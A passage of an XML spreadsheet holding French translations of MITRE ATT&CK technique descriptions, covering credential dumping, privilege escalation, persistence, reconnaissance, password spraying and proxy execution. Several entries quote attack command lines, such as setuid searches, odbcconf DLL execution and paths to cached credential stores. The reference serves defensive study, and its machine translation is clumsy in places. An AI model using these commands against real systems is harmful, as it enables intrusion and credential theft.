* Kerberos : Recommandé pour l’authentification mutuelle de domaine client-serveur dans Windows 2000 et versions ultérieures.
* CredSSP : Fournit l’authentification SSO et l’authentification au niveau du réseau pour les services de bureau à distance. (Citation : Protection des informations d’identification des blogs TechNet)
https://attack.mitre.org/techniques/T1003/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter des balayages de reconnaissance actifs pour recueillir des informations qui peuvent être utilisées pendant le ciblage. Les analyses actives sont celles où l’adversaire sonde l’infrastructure de la victime via le trafic réseau, par opposition à d’autres formes de reconnaissance qui n’impliquent pas d’interaction directe.
Les adversaires peuvent effectuer différentes formes d’analyse active en fonction des informations qu’ils cherchent à recueillir. Ces analyses peuvent également être effectuées de différentes manières, notamment à l’aide de fonctionnalités natives de protocoles réseau tels que ICMP. (Citation : Botnet Scan)(Citation : Prise d’empreintes digitales OWASP) Les informations recueillies lors de ces analyses peuvent révéler des possibilités pour d’autres formes de reconnaissance (ex : [Recherche dans des sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593) ou [Recherche dans des bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596)), l’établissement de ressources opérationnelles (ex : [Développer des capacités](https://attack.mitre.org/techniques/T1587) ou [Obtenir des capacités](https://attack.mitre.org/techniques/T1588)), et/ou un accès initial (ex : [Externe à distance Services](https://attack.mitre.org/techniques/T1133) ou [Exploiter l’application publique](https://attack.mitre.org/techniques/T1190)).
https://attack.mitre.org/techniques/T1595</t>
  </si>
  <si>
    <t>Les adversaires peuvent contourner les mécanismes conçus pour contrôler les privilèges d’élévation afin d’obtenir des autorisations de niveau supérieur. La plupart des systèmes modernes contiennent des mécanismes natifs de contrôle d’élévation qui sont destinés à limiter les privilèges qu’un utilisateur peut effectuer sur une machine. L’autorisation doit être accordée à des utilisateurs spécifiques afin d’effectuer des tâches qui peuvent être considérées comme présentant un risque plus élevé. (Citation : TechNet Comment fonctionne l’UAC)(Citation : sudo man page 2018) Un adversaire peut utiliser plusieurs méthodes pour tirer parti des mécanismes de contrôle intégrés afin d’élever les privilèges sur un système. (Citation : logiciel malveillant OSX Keydnap)(Citation : Fortinet Fareit)
https://attack.mitre.org/techniques/T1548</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer un nouveau processus avec un jeton existant pour élever les privilèges et contourner les contrôles d’accès. Les processus peuvent être créés avec le jeton et le contexte de sécurité résultant d’un autre utilisateur à l’aide de fonctionnalités telles que &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; et &lt;code&gt;runas&lt;/code&gt;. (Citation : Microsoft RunAs)
La création de processus avec un jeton non associé à l’utilisateur actuel peut nécessiter les informations d’identification de l’utilisateur cible, des privilèges spécifiques pour emprunter l’identité de cet utilisateur ou l’accès au jeton à utiliser. Par exemple, le jeton peut être dupliqué via [Usurpation d’identité/Vol de jeton](https://attack.mitre.org/techniques/T1134/001) ou créé via [Créer et emprunter l’identité d’un jeton](https://attack.mitre.org/techniques/T1134/003) avant d’être utilisé pour créer un processus.
Bien que cette technique soit distincte de l'[Usurpation d’identité/Vol de jeton](https://attack.mitre.org/techniques/T1134/001), les techniques peuvent être utilisées conjointement lorsqu’un jeton est dupliqué, puis utilisé pour créer un nouveau processus.
https://attack.mitre.org/techniques/T1134/002</t>
  </si>
  <si>
    <t>Un adversaire peut abuser des configurations où une application a les bits setuid ou setgid définis afin d’exécuter le code dans le contexte d’un utilisateur différent (et peut-être plus privilégié). Sous Linux ou macOS, lorsque les bits setuid ou setgid sont définis pour un binaire d’application, l’application s’exécute avec les privilèges de l’utilisateur ou du groupe propriétaire respectivement. (Citation : page de manuel setuid) Normalement, une application est exécutée dans le contexte de l’utilisateur actuel, quel que soit l’utilisateur ou le groupe qui possède l’application. Toutefois, dans certains cas, les programmes doivent être exécutés dans un contexte élevé pour fonctionner correctement, mais l’utilisateur qui les exécute ne dispose peut-être pas des privilèges spécifiques requis.
Au lieu de créer une entrée dans le fichier sudoers, ce qui doit être fait par root, n’importe quel utilisateur peut spécifier l’indicateur setuid ou setgid à définir pour ses propres applications (c’est-à-dire [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). La commande &lt;code&gt;chmod&lt;/code&gt; peut définir ces bits avec le bitmasking, &lt;code&gt;chmod 4777 [file]&lt;/code&gt; ou via un nommage abrégé, &lt;code&gt;chmod u+s [file]&lt;/code&gt;. Cela activera le bit setuid. Pour activer le bit setgid, &lt;code&gt;chmod 2775&lt;/code&gt; et &lt;code&gt;chmod g+s&lt;/code&gt; peuvent être utilisés.
Les adversaires peuvent utiliser ce mécanisme sur leurs propres logiciels malveillants pour s’assurer qu’ils sont en mesure de s’exécuter dans des contextes élevés à l’avenir. (Citation : logiciel malveillant OSX Keydnap) Cet abus fait souvent partie d’une « évasion de shell » ou d’autres actions visant à contourner un environnement d’exécution avec des autorisations restreintes.
Alternativement, les adversaires peuvent choisir de trouver et de cibler des binaires vulnérables avec les bits setuid ou setgid déjà activés (c’est-à-dire [Découverte de fichiers et de répertoires](https://attack.mitre.org/techniques/T1083)). Les bits setuid et setguid sont indiqués par un « s » au lieu d’un « x » lors de l’affichage des attributs d’un fichier via &lt;code&gt;ls -l&lt;/code&gt;. La commande &lt;code&gt;find&lt;/code&gt; peut également être utilisée pour rechercher de tels fichiers. Par exemple, &lt;code&gt;find / -perm +4000 2&gt;/dev/null&lt;/code&gt; peut être utilisé pour trouver des fichiers avec setuid défini et &lt;code&gt;find / -perm +2000 2&gt;/dev/null&lt;/code&gt; peut être utilisé pour setgid. Les binaires qui ont ces bits définis peuvent alors être abusés par des adversaires. (Citation : go awayBins Suid)
https://attack.mitre.org/techniques/T1548/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des fonctionnalités de Winlogon pour exécuter des DLL et/ou des exécutables lorsqu’un utilisateur se connecte. Winlogon.exe s’agit d’un composant Windows responsable des actions à l’ouverture de session/déconnexion ainsi que de la séquence d’attention sécurisée (SAS) déclenchée par Ctrl-Alt-Suppr. Les entrées de registre dans &lt;code&gt;HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\&lt;/code&gt; et &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&lt;/code&gt; sont utilisées pour gérer des programmes d’assistance et des fonctionnalités supplémentaires qui prennent en charge Winlogon. (Citation : Cylance Reg Persistence septembre 2013) 
Les modifications malveillantes apportées à ces clés de registre peuvent entraîner le chargement et l’exécution par Winlogon de DLL et/ou d’exécutables malveillants. Plus précisément, les sous-clés suivantes sont connues pour être potentiellement vulnérables aux abus : (Citation : Cylance Reg Persistence Septembre 2013)
* Winlogon\Notify - pointe vers les DLL du package de notification qui gèrent les événements Winlogon
* Winlogon\Userinit - pointe vers userinit.exe, le programme d’initialisation de l’utilisateur exécuté lorsqu’un utilisateur se connecte
* Winlogon\Shell - pointe vers explorer.exe, le shell système exécuté lorsqu’un utilisateur se connecte
Les adversaires peuvent tirer parti de ces fonctionnalités pour exécuter à plusieurs reprises du code malveillant et établir une persistance.
https://attack.mitre.org/techniques/T1547/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des [comptes valides](https://attack.mitre.org/techniques/T1078) pour interagir avec des machines distantes en tirant parti du modèle DCOM (Distributed Component Object Model). L’adversaire peut alors effectuer des actions en tant qu’utilisateur connecté.
Le modèle COM (Windows Component Object Model) est un composant de l’interface de programmation d’application (API) native de Windows qui permet l’interaction entre des objets logiciels ou du code exécutable qui implémente une ou plusieurs interfaces. Par COM, un objet client peut appeler des méthodes d’objets serveur, qui sont généralement des bibliothèques de liens dynamiques (DLL) ou des exécutables (EXE). Distributed COM (DCOM) est un middleware transparent qui étend les fonctionnalités de COM au-delà d’un ordinateur local à l’aide de la technologie d’appel de procédure distante (RPC). (Référence : Fireeye Hunting COM juin 2019)(Citation : Microsoft COM)
Les autorisations d’interaction avec les objets COM du serveur local et distant sont spécifiées par les listes de contrôle d’accès (ACL) dans le registre. (Citation : Clés Com à l’échelle du processus Microsoft) Par défaut, seuls les administrateurs peuvent activer et lancer à distance des objets COM via DCOM. (Référence : Microsoft COM ACL)
Grâce à DCOM, les adversaires opérant dans le contexte d’un utilisateur disposant de privilèges appropriés peuvent obtenir à distance l’exécution arbitraire et même directe de shellcode via des applications Office (Citation : Enigma Outlook DCOM Lateral Movement Nov 2017) ainsi que d’autres objets Windows contenant des méthodes non sécurisées. (Citation : Enigma MMC20 COM janvier 2017)(Citation : Enigma DCOM Lateral Movement Jan 2017) DCOM peut également exécuter des macros dans des documents existants (Citation : Enigma Excel DCOM Sept 2017) et peut également appeler l’exécution [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) directement via une instance créée par COM d’une application Microsoft Office (Citation : Cyberreason DCOM DDE Lateral Movement Nov 2017), en contournant le besoin d’un document malveillant. DCOM peut être utilisé comme méthode d’interaction à distance avec [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Référence : MSDN WMI)
https://attack.mitre.org/techniques/T1021/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser une seule ou une petite liste de mots de passe couramment utilisés sur de nombreux comptes différents pour tenter d’obtenir des informations d’identification de compte valides. La pulvérisation de mots de passe utilise un seul mot de passe (par exemple « Password01 »), ou une petite liste de mots de passe couramment utilisés, qui peuvent correspondre à la politique de complexité du domaine. Les connexions sont tentées avec ce mot de passe sur de nombreux comptes différents sur un réseau afin d’éviter les verrouillages de compte qui se produiraient normalement lors de la force brute d’un seul compte avec plusieurs mots de passe. (Citation : Pulvérisation de mots de passe BlackHillsInfosec)
En règle générale, les services de gestion sur les ports couramment utilisés sont utilisés lors de la pulvérisation de mots de passe. Les services les plus souvent ciblés sont les suivants :
* SSH (22/TCP)
* Telnet (23/TCP)
* FTP (21/TCP)
* NetBIOS / SMB / Samba (139/TCP et 445/TCP)
* LDAP (389/TCP)
* Kerberos (88/TCP)
* RDP / Terminal Services (3389/TCP)
* Services de gestion HTTP/HTTP (80/TCP et 443/TCP)
* MSSQL (1433/TCP)
* Oracle (1521/TCP)
* MySQL (3306/TCP)
* VNC (5900/TCP)
Outre les services de gestion, les adversaires peuvent « cibler l’authentification unique (SSO) et les applications basées sur le cloud à l’aide de protocoles d’authentification fédérés », ainsi que les applications de messagerie externes, telles qu’Office 365. (Référence : US-CERT TA18-068A 2018)
Dans les environnements par défaut, les tentatives de connexion LDAP et Kerberos sont moins susceptibles de déclencher des événements via SMB, ce qui crée l’événement d'« échec de connexion » Windows ID 4625.
https://attack.mitre.org/techniques/T1110/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser un proxy externe pour servir d’intermédiaire pour les communications réseau vers un serveur de commande et de contrôle afin d’éviter les connexions directes à leur infrastructure. Il existe de nombreux outils qui permettent la redirection du trafic via des proxys ou la redirection de port, notamment [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy et ZXPortMap. (Citation : Outils d’attaque APT de Trend Micro) Les adversaires utilisent ces types de proxys pour gérer les communications de commande et de contrôle, pour assurer la résilience face à la perte de connexion ou pour contourner les voies de communication fiables existantes afin d’éviter les soupçons.
Les proxys de connexion externe sont utilisés pour masquer la destination du trafic C2 et sont généralement implémentés avec des redirecteurs de port. Les systèmes compromis en dehors de l’environnement victime peuvent être utilisés à ces fins, ainsi que l’infrastructure achetée telle que les ressources basées sur le cloud ou les serveurs privés virtuels. Les proxys peuvent être choisis en fonction de la faible probabilité qu’une connexion à ceux-ci à partir d’un système compromis soit étudiée. Les systèmes victimes communiquaient directement avec le proxy externe sur Internet, puis le proxy transmettait les communications au serveur C2.
https://attack.mitre.org/techniques/T1090/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent installer du code sur des portails externes, tels qu’une page de connexion VPN, pour capturer et transmettre les informations d’identification des utilisateurs qui tentent de se connecter au service. Par exemple, une page de connexion compromise peut enregistrer les informations d’identification fournies à l’utilisateur avant de le connecter au service.
Cette variation de la capture d’entrée peut être effectuée après la compromission en utilisant un accès administratif légitime comme mesure de sauvegarde pour maintenir l’accès au réseau via [Services à distance externes](https://attack.mitre.org/techniques/T1133) et [Comptes valides](https://attack.mitre.org/techniques/T1078) ou dans le cadre de la compromission initiale par l’exploitation du service Web externe. (Citation : Volexity Virtual Private Keylogging)
https://attack.mitre.org/techniques/T1056/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent collecter des adresses e-mail qui peuvent être utilisées lors du ciblage. Même s’il existe des instances internes, les organisations peuvent disposer d’une infrastructure de messagerie publique et d’adresses pour les employés.
Les adversaires peuvent facilement recueillir des adresses électroniques, car elles peuvent être facilement accessibles et exposées via des ensembles de données en ligne ou d’autres ensembles de données accessibles (ex : [Médias sociaux](https://attack.mitre.org/techniques/T1593/001) ou [Sites Web appartenant à la victime de recherche](https://attack.mitre.org/techniques/T1594)). (Citation : HackersArise Email)(Citation : CNET Leaks) Les adresses e-mail peuvent également être énumérées par des moyens plus actifs (c’est-à-dire [Analyse active](https://attack.mitre.org/techniques/T1595)), tels que l’exploration et l’analyse des réponses des services d’authentification qui peuvent révéler des noms d’utilisateur valides dans un système. (Citation : GrimBlog Nom d’utilisateurEnum) Par exemple, les adversaires peuvent être en mesure d’énumérer des adresses e-mail dans des environnements Office 365 en interrogeant divers points de terminaison d’API disponibles publiquement, tels que autodiscover et GetCredentialType. (citation : GitHub Office 365 User Enumeration)(Citation : Azure Active Directory Reconnaisance)
La collecte de ces informations peut révéler des opportunités pour d’autres formes de reconnaissance (ex : [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593) ou [Phishing pour obtenir des informations](https://attack.mitre.org/techniques/T1598)), l’établissement de ressources opérationnelles (ex : [Comptes de messagerie](https://attack.mitre.org/techniques/T1586/002))), et/ou l’accès initial (ex : [Phishing](https://attack.mitre.org/techniques/T1566) ou [Force brute]( https://attack.mitre.org/techniques/T1110) via [Services à distance externes](https://attack.mitre.org/techniques/T1133)).
https://attack.mitre.org/techniques/T1589/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des communications vocales pour obtenir des informations sensibles qui peuvent être utilisées lors du ciblage. Le spearphishing pour obtenir des informations est une tentative d’inciter les cibles à divulguer des informations, souvent des informations d’identification ou d’autres informations exploitables. Le harponnage de l’information fait souvent appel à des techniques d’ingénierie sociale, telles que se faire passer pour une source ayant une raison de collecter des informations (ex : [Usurpation d’identité](https://attack.mitre.org/techniques/T1656)) et/ou créer un sentiment d’urgence ou d’alarme pour le destinataire.
Toutes les formes d’hameçonnage sont transmises par voie électronique. Dans ce scénario, les adversaires utilisent des appels téléphoniques pour obtenir des informations sensibles de la part des victimes. Connues sous le nom de phishing vocal (ou « vishing »), ces communications peuvent être exécutées manuellement par des adversaires, des centres d’appels embauchés ou même automatisées via des appels automatisés. Les hameçonneurs vocaux peuvent usurper leur numéro de téléphone tout en se faisant passer pour une entité de confiance, telle qu’un partenaire commercial ou un membre du personnel d’assistance technique. (Citation : Arnaques téléphoniques BOA)
Les victimes peuvent également recevoir des messages d’hameçonnage qui les informent d’appeler un numéro de téléphone (« hameçonnage par rappel ») où l’adversaire tente de collecter des informations confidentielles. (Citation : hameçonnage par rappel Avertium)
Les adversaires peuvent également utiliser des informations provenant d’efforts de reconnaissance antérieurs (par exemple : [Rechercher des sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593) ou [Rechercher des sites Web appartenant à la victime](https://attack.mitre.org/techniques/T1594)) pour adapter les prétextes afin qu’ils soient encore plus persuasifs et crédibles pour la victime.
https://attack.mitre.org/techniques/T1598/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’accéder aux informations d’identification de domaine mises en cache utilisées pour permettre l’authentification en cas d’indisponibilité d’un contrôleur de domaine. (Citation : Microsoft - Crédits mis en cache)
Sur Windows Vista et versions ultérieures, le format de hachage est le hachage DCC2 (Domain Cached Credentials version 2), également connu sous le nom de hachage MS-Cache v2. (Citation : PassLib mscache) Le nombre d’informations d’identification mises en cache par défaut varie et peut être modifié selon le système. Ce hachage n’autorise pas les attaques de type pass-the-hash, mais nécessite à la place [Craquage de mot de passe](https://attack.mitre.org/techniques/T1110/002) pour récupérer le mot de passe en texte brut. (Citation : ired mscache)
Sur les systèmes Linux, les informations d’identification Active Directory sont accessibles via des caches gérés par des logiciels tels que System Security Services Daemon (SSSD) ou Quest Authentication Services (anciennement VAS). Les hachages d’informations d’identification mis en cache se trouvent généralement dans '/var/lib/sss/db/cache. [domain].ldb' pour SSSD ou '/var/opt/quest/vas/authcache/vas_auth.vdb' pour Quest. Les adversaires peuvent utiliser des utilitaires, tels que 'tdbdump', sur ces fichiers de base de données pour vider les hachages mis en cache et utiliser [Craquage de mot de passe](https://attack.mitre.org/techniques/T1110/002) pour obtenir le mot de passe en texte brut. (Citation : Brining MimiKatz à Unix) 
Avec l’accès SYSTEM ou sudo, les outils/utilitaires tels que [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075) et secretsdump.py pour Windows ou Linikatz pour Linux peuvent être utilisés pour extraire les informations d’identification mises en cache. (Citation : Brining MimiKatz à Unix)
Remarque : Les informations d’identification mises en cache pour Windows Vista sont dérivées à l’aide de PBKDF2. (Citation : PassLib mscache)
https://attack.mitre.org/techniques/T1003/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier le fichier &lt;code&gt;de authorized_keys&lt;/code&gt; SSH pour maintenir la persistance sur un hôte victime. Les distributions Linux et macOS utilisent couramment l’authentification basée sur les clés pour sécuriser le processus d’authentification des sessions SSH pour la gestion à distance. Le fichier &lt;code&gt;authorized_keys&lt;/code&gt; en SSH spécifie les clés SSH qui peuvent être utilisées pour se connecter au compte d’utilisateur pour lequel le fichier est configuré. Ce fichier se trouve généralement dans le répertoire personnel de l’utilisateur sous &lt;code&gt;&amp;lt;user-home&amp;gt;/.ssh/authorized_keys&lt;/code&gt;. (Citation : Clés autorisées SSH) Les utilisateurs peuvent modifier le fichier de configuration SSH du système pour modifier les directives PubkeyAuthentication et RSAAuthentication à la valeur « yes » afin de s’assurer que la clé publique et l’authentification RSA sont activées. Le fichier de configuration SSH se trouve généralement sous &lt;code&gt;/etc/ssh/sshd_config&lt;/code&gt;.
Les adversaires peuvent modifier les fichiers &lt;code&gt;authorized_keys&lt;/code&gt; SSH directement à l’aide de scripts ou de commandes shell pour ajouter leurs propres clés publiques fournies par l’adversaire. Dans les environnements cloud, les adversaires peuvent être en mesure de modifier le fichier authorized_keys SSH d’une machine virtuelle particulière via l’interface de ligne de commande ou l’API REST. Par exemple, à l’aide de la commande « add-metadata » de l’interface de ligne de commande Google Cloud, un adversaire peut ajouter des clés SSH à un compte utilisateur. (citation : Google Cloud Ajouter des métadonnées)(Citation : Élévation de privilèges Google Cloud) De même, dans Azure, un adversaire peut mettre à jour le fichier authorized_keys d’une machine virtuelle via une requête PATCH adressée à l’API. (Citation : Machines virtuelles de mise à jour Azure) Cela garantit qu’un adversaire possédant la clé privée correspondante peut se connecter en tant qu’utilisateur existant via SSH. (Citation : Abus de la clé SSH de Venafi)(Citation : Cybereason Linux Exim Worm) Cela peut également entraîner une élévation de privilèges lorsque la machine virtuelle ou l’instance dispose d’autorisations distinctes de celles de l’utilisateur demandeur.
Lorsque authorized_keys fichiers sont modifiés via des API cloud ou des interfaces de ligne de commande, un adversaire peut obtenir une élévation de privilèges sur la machine virtuelle cible s’il ajoute une clé à un utilisateur disposant de privilèges plus élevés. 
Les clés SSH peuvent également être ajoutées aux comptes sur les périphériques réseau, par exemple avec la commande 'ip ssh pubkey-chain' [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). (Référence : cisco_ip_ssh_pubkey_ch_cmd)
https://attack.mitre.org/techniques/T1098/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur les appliances de sécurité réseau de la victime qui peuvent être utilisées lors du ciblage. Les informations sur les appliances de sécurité réseau peuvent inclure divers détails, tels que l’existence et les spécificités des pare-feu déployés, des filtres de contenu et des proxys/hôtes bastionnaires. Les adversaires peuvent également cibler des informations sur les systèmes de détection d’intrusion basés sur le réseau (NIDS) de la victime ou d’autres appareils liés aux opérations de cybersécurité défensives.
Les adversaires peuvent collecter ces informations de différentes manières, par exemple par le biais d’une [analyse active](https://attack.mitre.org/techniques/T1595) ou d’un [hameçonnage pour obtenir des informations](https://attack.mitre.org/techniques/T1598). (Citation : Nmap firewalls NIDS) Les informations relatives aux appliances de sécurité réseau peuvent également être exposées à des adversaires via des ensembles de données en ligne ou d’autres ensembles de données accessibles (ex : [Sites Web appartenant à des victimes de recherche](https://attack.mitre.org/techniques/T1594)). La collecte de ces informations peut révéler des possibilités pour d’autres formes de reconnaissance (ex : [Rechercher dans des bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596) ou [Rechercher dans des sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), d’établir des ressources opérationnelles (ex : [Développer des capacités](https://attack.mitre.org/techniques/T1587) ou [Obtenir des capacités](https://attack.mitre.org/techniques/T1588)), et/ou un accès initial (ex : [Externe à distance Services](https://attack.mitre.org/techniques/T1133)).
https://attack.mitre.org/techniques/T1590/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent établir une persistance et/ou élever des privilèges en exécutant du contenu malveillant déclenché par des débogueurs IFEO (Image File Execution Options). Les IFEO permettent à un développeur d’attacher un débogueur à une application. Lorsqu’un processus est créé, un débogueur présent dans l’IFEO d’une application est ajouté au nom de l’application, ce qui permet de lancer le nouveau processus sous le débogueur (par exemple, &lt;code&gt;C :\dbg\ntsd.exe -g notepad.exe&lt;/code&gt;). (Citation : Microsoft Dev Blog IFEO mars 2010)
Les IFEO peuvent être définis directement via le registre ou dans les Global Flags via l’outil GFlags. (Citation : Microsoft GFlags mars 2017) Les IFEO sont représentés sous forme de valeurs de &lt;code&gt;débogueur&lt;/code&gt; dans le registre sous &lt;code&gt;HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\&lt;executable&gt;&lt;/code&gt; où &lt;code&gt;&amp;lt;exécutable&amp;gt;&lt;/code&gt; est le fichier binaire auquel le débogueur est attaché. (Citation : Microsoft Dev Blog IFEO mars 2010)
Les IFEO peuvent également permettre le lancement d’un programme de surveillance arbitraire lorsqu’un programme spécifié se termine silencieusement (c’est-à-dire qu’il est prématurément arrêté par lui-même ou par un second processus non en mode noyau). (Citation : Microsoft Silent Process Exit NOV 2017) (Référence : Oddvar Moe IFEO AVRIL 2018) À l’instar des débogueurs, la surveillance des sorties silencieuses peut être activée via GFlags et/ou en modifiant directement les valeurs de registre IFEO et de sortie de processus silencieux dans &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\&lt;/code&gt;. (Citation : Microsoft Silent Process Exit NOV 2017) (Référence : Oddvar Moe IFEO AVRIL 2018)
À l’instar des [Fonctionnalités d’accessibilité](https://attack.mitre.org/techniques/T1546/008), sous Windows Vista et versions ultérieures, ainsi que sur Windows Server 2008 et versions ultérieures, une clé de registre peut être modifiée pour configurer « cmd.exe » ou un autre programme qui fournit un accès par porte dérobée, en tant que « débogueur » pour un programme d’accessibilité (par exemple : utilman.exe). Une fois le registre modifié, le fait d’appuyer sur la combinaison de touches appropriée sur l’écran de connexion lorsque vous êtes au clavier ou lorsque vous êtes connecté avec [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) entraînera l’exécution du programme « débogueur » avec les privilèges SYSTEM. (Référence : Tilbury 2014)
À l’instar de [Process Injection](https://attack.mitre.org/techniques/T1055), ces valeurs peuvent également être utilisées de manière abusive pour obtenir une élévation de privilèges en provoquant le chargement et l’exécution d’un exécutable malveillant dans le contexte de processus distincts sur l’ordinateur. (Citation : Injection de processus élastique juillet 2017) L’installation de mécanismes IFEO peut également fournir une persistance via une invocation déclenchée continue.
Les logiciels malveillants peuvent également utiliser IFEO pour [Entraver les défenses](https://attack.mitre.org/techniques/T1562) en enregistrant des débogueurs invalides qui redirigent et désactivent efficacement diverses applications système et de sécurité. (Citation : FSecure Hupigon) (Référence : Symantec Ushedix, juin 2008)
https://attack.mitre.org/techniques/T1546/012</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de l’exécution de charges utiles malveillantes odbcconf.exe par proxy de proxy. Odbcconf.exe s’agit d’un utilitaire Windows qui vous permet de configurer les pilotes ODBC (Open Database Connectivity) et les noms de sources de données. (Référence : Microsoft odbcconf.exe) Le fichier binaire Odbcconf.exe peut être signé numériquement par Microsoft.
Les adversaires peuvent abuser de odbcconf.exe pour contourner les solutions de contrôle des applications qui ne tiennent pas compte de leur abus potentiel. Semblable à [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe dispose d’un indicateur &lt;code&gt;REGSVR&lt;/code&gt; qui peut être utilisé à mauvais escient pour exécuter des DLL (ex : &lt;code&gt;odbcconf.exe /S /A &amp;lbrace ;REGSVR « C :\Users\Public\file.dll"&amp;rbrace ;&lt;/code&gt;). (Citation : LOLBAS Odbcconf)(Citation : TrendMicro Squiblydoo août 2017)(Citation : TrendMicro Cobalt Group, novembre 2017)
https://attack.mitre.org/techniques/T1218/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser les moteurs de recherche pour collecter des informations sur les victimes qui peuvent être utilisées lors du ciblage. Les services de moteurs de recherche analysent généralement les sites en ligne pour indexer le contexte et peuvent fournir aux utilisateurs une syntaxe spécialisée pour rechercher des mots-clés spécifiques ou des types de contenu spécifiques (c’est-à-dire des types de fichiers). (Citation : SecurityTrails Google Hacking)(Citation : ExploitDB GoogleHacking)
Les adversaires peuvent élaborer diverses requêtes sur les moteurs de recherche en fonction des informations qu’ils cherchent à recueillir. Les auteurs de menace peuvent utiliser les moteurs de recherche pour recueillir des renseignements généraux sur les victimes, ainsi que des requêtes spécialisées pour rechercher des déversements ou des fuites d’informations sensibles telles que des détails sur le réseau ou des informations d’identification. Les informations provenant de ces sources peuvent révéler des possibilités pour d’autres formes de reconnaissance (ex : [Phishing pour obtenir des informations](https://attack.mitre.org/techniques/T1598) ou [Recherche dans des bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596)), la mise en place de ressources opérationnelles (ex : [Établissement de comptes](https://attack.mitre.org/techniques/T1585) ou [Compromission de comptes](https://attack.mitre.org/techniques/T1586)), et/ou l’accès initial (ex : [Valide Comptes](https://attack.mitre.org/techniques/T1078) ou [Hameçonnage](https://attack.mitre.org/techniques/T1566)).
https://attack.mitre.org/techniques/T1593/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur les relations d’affaires de la victime qui peuvent être utilisées lors du ciblage. Les informations sur les relations d’affaires d’une organisation peuvent inclure une variété de détails, y compris des organisations/domaines de deuxième partie ou de tiers (par exemple, des fournisseurs de services gérés, des entrepreneurs, etc.) qui ont un accès au réseau connecté (et potentiellement élevé). Ces informations peuvent également révéler les chaînes d’approvisionnement et les voies d’expédition des ressources matérielles et logicielles de la victime.
Les adversaires peuvent recueillir ces informations de différentes manières, par exemple par le biais de l’hameçonnage par le biais de [Phishing for Information](https://attack.mitre.org/techniques/T1598). Les informations sur les relations d’affaires peuvent également être exposées à des adversaires par le biais d’informations en ligne ou d’autres ensembles de données accessibles (ex : [Médias sociaux](https://attack.mitre.org/techniques/T1593/001) ou [Sites Web appartenant à des victimes de recherche](https://attack.mitre.org/techniques/T1594)). (Citation : Fuite ThreatPost Broadvoice) La collecte de ces informations peut révéler des opportunités pour d’autres formes de reconnaissance (ex : [Phishing pour obtenir des informations](https://attack.mitre.org/techniques/T1598) ou [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), d’établissement de ressources opérationnelles (ex : [Établir des comptes](https://attack.mitre.org/techniques/T1585) ou [Compromettre des comptes](https://attack.mitre.org/techniques/T1586)), et/ou d’accès initial (ex : [Chaîne d’approvisionnement Compromis](https://attack.mitre.org/techniques/T1195), [Compromission intempestive](https://attack.mitre.org/techniques/T1189) ou [Relation de confiance](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1591/002</t>
  </si>
  <si>
    <t>Un adversaire peut exploiter les périphériques d’un ordinateur (par exemple, des caméras intégrées ou des webcams) ou des applications (par exemple, des services d’appel vidéo) pour capturer des enregistrements vidéo dans le but de recueillir des informations. Des images peuvent également être capturées à partir d’appareils ou d’applications, éventuellement à des intervalles spécifiés, à la place des fichiers vidéo.
Des logiciels malveillants ou des scripts peuvent être utilisés pour interagir avec les appareils par le biais d’une API disponible fournie par le système d’exploitation ou d’une application pour capturer des vidéos ou des images. Les fichiers vidéo ou image peuvent être écrits sur le disque et exfiltrés ultérieurement. Cette technique diffère de la [Capture d’écran](https://attack.mitre.org/techniques/T1113) en raison de l’utilisation d’appareils ou d’applications spécifiques pour l’enregistrement vidéo plutôt que pour la capture de l’écran de la victime.
Dans macOS, il existe différents échantillons de logiciels malveillants qui enregistrent la webcam de l’utilisateur, tels que FruitFly et Proton. (Citation : objectif-voir revue 2017)
https://attack.mitre.org/techniques/T1125</t>
  </si>
  <si>
    <t>Les adversaires peuvent injecter du code malveillant dans le processus via le doppelgänging de processus afin d’échapper aux défenses basées sur les processus et éventuellement d’élever les privilèges. Le doppelgänging de processus est une méthode d’exécution de code arbitraire dans l’espace d’adressage d’un processus actif distinct. 
